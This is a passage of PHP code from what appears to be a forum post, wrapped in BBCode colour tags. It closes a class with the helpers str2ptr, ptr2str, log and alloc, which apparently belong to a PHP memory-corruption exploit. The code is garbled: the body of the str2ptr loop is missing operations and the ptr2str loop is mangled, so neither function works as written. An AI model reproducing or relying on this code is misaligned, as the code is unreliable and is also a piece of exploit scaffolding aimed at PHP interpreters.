private function[/COLOR][COLOR="#0000BB"]str2ptr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]) { [/COLOR][COLOR="#0000BB"]$address[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]; for([/COLOR][COLOR="#0000BB"]$j[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$j[/COLOR][COLOR="#007700"]>=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$j[/COLOR][COLOR="#007700"]--) { [/COLOR][COLOR="#0000BB"]$address[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]abc[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$j[/COLOR][COLOR="#007700"]]); } return[/COLOR][COLOR="#0000BB"]$address[/COLOR][COLOR="#007700"]; }
private function[/COLOR][COLOR="#0000BB"]ptr2str[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ptr[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]) { [/COLOR][COLOR="#0000BB"]$out[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; for ([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]>=[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]; } return[/COLOR][COLOR="#0000BB"]$out[/COLOR][COLOR="#007700"]; }
private function[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$format[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) { if([/COLOR][COLOR="#0000BB"]LOGGING[/COLOR][COLOR="#007700"]) { [/COLOR][COLOR="#0000BB"]printf[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$format[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"]); } }
static function[/COLOR][COLOR="#0000BB"]alloc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$size[/COLOR][COLOR="#007700"]) { return[/COLOR][COLOR="#0000BB"]str_shuffle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]str_repeat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'A'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$size[/COLOR][COLOR="#007700"])); } } [/COLOR][COLOR="#0000BB"]?> [/COLOR] [/COLOR]